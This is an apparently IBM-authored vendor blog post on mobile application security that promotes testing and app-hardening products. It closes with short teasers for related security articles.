Historically, when companies think about mobile security, the first thing that comes to mind is how to deal with lost or compromised mobile devices. The good news is that many organizations are well on their way to blocking device-based risks by deploying enterprise mobility management (EMM) solutions such as IBM MaaS360.

After addressing device-related risks, businesses generally turn their attention to applications on employees’ devices, to determine whether the apps pose a threat to user information or organizational data. To assure application security on corporate-owned or corporate-controlled devices, mobile application management (MAM) features have been added to EMM solutions. IBM MaaS360 is also a leader in the EMM marketplace

More advanced protection measures, such as controlling logins to corporate networks based on device or location, can be added when a higher level of security protection is required.

Protecting the Apps You Build

Unfortunately, there is a gaping hole in many, if not most, mobile security protection measures. The volume of mobile applications that companies are building for their customers, partners, employees — in fact, for the entire world to use — is generally not even under the direct control of security organizations.

Mobile applications are taking up a greater percentage of new development budgets within corporations. For example, in its IT survey, “State of Application Development Report,” OutSystems found that:

  • Mobility was rated by 43 percent of responders as the most critical business functionality or process for applications.
  • More than half of responders plan to add a mobile component to between 51 and 100 percent of their applications.

Learn How to Effectively Manage Application Security Risk in the Cloud

Moreover, mobile apps are rapidly becoming the most important interaction point with all users. We would think that existing application security programs would effectively address mobile applications as part of existing protection efforts, but there are several factors that have prevented mobile applications from being included in such initiatives:

  • Organizations have been slow to recognize that threats posed by mobile applications since they have traditionally been viewed as “browsers in small packages.” However, as growing amounts of data and more advanced capabilities reside on devices, a multitude of new risks of potential compromise are also added.
  • Many mobile applications are not built by corporate development organizations, which typically require multiple levels of testing and organizational compliance before applications are released. Instead, numerous marketing, e-commerce, customer care and related organizations autonomously build their own mobile apps, and even more of them outsource mobile development to external consultants, integrators or digital agencies. A recent study by 451 Research found 42 percent of mobile app development is being done outside of IT, and in two years two-thirds of mobile apps will be developed externally.
  • In contrast to customary controls and processes that an IT organization can have over deployment of Web or desktop applications, mobile applications can be simply uploaded to an app store with little corporate oversight.

Four Pillars of Application Security Risk Management

So how should you go about securing the mobile applications that you build or have built for you? Ideally, your program should make use of four pillars of risk management:

  • Test application code for security vulnerabilities.
  • Test completed applications for security vulnerabilities and malware.
  • Test the back-end for new vulnerabilities surfaced by mobile applications.
  • Harden applications to keep them from potential tampering.

Testing Your Application Code

Testing application code should involve static analysis of actual data flow within the code to determine where it is vulnerable to attack. OWASP has issued a list of the top 10 mobile risks, which includes potential threats such as insecure data storage, client-side injection and broken cryptography.

Testing Your Completed Applications

When your development process has been completed, but prior to applications being uploaded to app stores or being distributed, apps should be tested utilizing IBM Application Security on Cloud. Application Security on Cloud takes an application’s Android APK or iOS IPA and interactively assesses code by conducting automated penetration testing. It analyzes results based on how applications or devices respond.

Because this type of dynamic analysis actually runs on the application, it can identify additional vulnerabilities that cannot be found with static analysis. However, there are risks that can only be found by analyzing the source code itself. So for the highest level of security protection, both techniques should be utilized.

For most organizations, the best approach is to kick off your application security program with a straightforward solution such as Application Security on Cloud and then progress to IBM Security AppScan Source as your mobile application security program matures and expands.

Testing Your Back-End Services

Securing applications from potential vulnerabilities is a good start, but by itself is insufficient. Mobile apps may surface new vulnerabilities to back-end services and the data that they access.

A good practice is to test the back-end using the mobile app. This can be performed with IBM Security AppScan Standard, which can be configured to conduct penetration testing of the back-end with applications on a device emulator or even on the device itself.

Hardening Your Apps

So, finally you have a secure app and your work is done — or so you think! Remember, mobile apps are very different than traditional applications that remain under control of your IT department.

Mobile apps by their nature live in the wild in app stores and on devices. Even though they may be secure when they are deployed, once in the wild they are subject to a wide variety of nefarious attacks. For example, hackers can download apps, utilize readily available tools to decompile them, insert malware and publish them back in app stores where they look very similar to authentic applications.

Such malware can do anything from tracking users’ locations, to intercepting transactions to and from financial institutions, to stealing users’ IDs, credentials and cryptographic keys, enabling hackers to impersonate authentic users to access personal or even corporate data.

How can you protect yourself from such threats? The answer is to harden your mobile applications, to protect them from being altered. IBM partners with one of the leading solution providers in this space, Arxan Technologies.

Arxan Application Protection for IBM Solutions leverages a variety of approaches to defend against and detect attacks, including the following:

  • Advanced obfuscation;
  • Encryption;
  • Metadata removal;
  • Checksum;
  • Debug detection;
  • Resource verification;
  • Jailbreak/root detection; and
  • Swizzling detection.

As such, the solution can address a wide range of potential application attacks. If an intrusion is detected, applications can self-protect by shutting down, self-repairing or alerting you by phoning home.

Putting It All Together

The four approaches we discussed (testing your application code, testing your completed apps, testing your back-end services and hardening your apps) are all vital protection measures for applications that are being built and deployed. Of course, you can always consider starting your risk management program with one of those options, gaining additional expertise, then improving security over time by implementing the other options as your experience grows.

But it’s only when you’ve built all four of the options into your secure development life cycle that you can experience the comfort of knowing you’ve done all you can do to effectively manage your mobile application security.

Learn How to Effectively Manage Application Security Risk in the Cloud

More from Application Security

Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours

‘Patch Tuesday, Exploit Wednesday’ is an old hacker adage that refers to the weaponization of vulnerabilities the day after monthly security patches become publicly available. As security improves and exploit mitigations become more sophisticated, the amount of research and development required to craft a weaponized exploit has increased. This is especially relevant for memory corruption vulnerabilities.Figure 1 — Exploitation timelineHowever, with the addition of new features (and memory-unsafe C code) in the Windows 11 kernel, ripe new attack surfaces can…

Backdoor Deployment and Ransomware: Top Threats Identified in X-Force Threat Intelligence Index 2023

Deployment of backdoors was the number one action on objective taken by threat actors last year, according to the 2023 IBM Security X-Force Threat Intelligence Index — a comprehensive analysis of our research data collected throughout the year. Backdoor access is now among the hottest commodities on the dark web and can sell for thousands of dollars, compared to credit card data — which can go for as low as $10. On the dark web — a veritable eBay for…

Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers

Overview In this post, IBM Security X-Force Red offensive hackers analyze how attackers, with elevated privileges, can use their access to stage Windows Kernel post-exploitation capabilities. Over the last few years, public accounts have increasingly shown that less sophisticated attackers are using this technique to achieve their objectives. It is therefore important that we put a spotlight on this capability and learn more about its potential impact. Specifically, in this post, we will evaluate how Kernel post-exploitation can be used…

Detecting the Undetected: The Risk to Your Info

IBM’s Advanced Threat Detection and Response Team (ATDR) has seen an increase in the malware family known as information stealers in the wild over the past year. Info stealers are malware with the capability of scanning for and exfiltrating data and credentials from your device. When executed, they begin scanning for and copying various directories that usually contain some sort of sensitive information or credentials including web and login data from Chrome, Firefox, and Microsoft Edge. In other instances, they…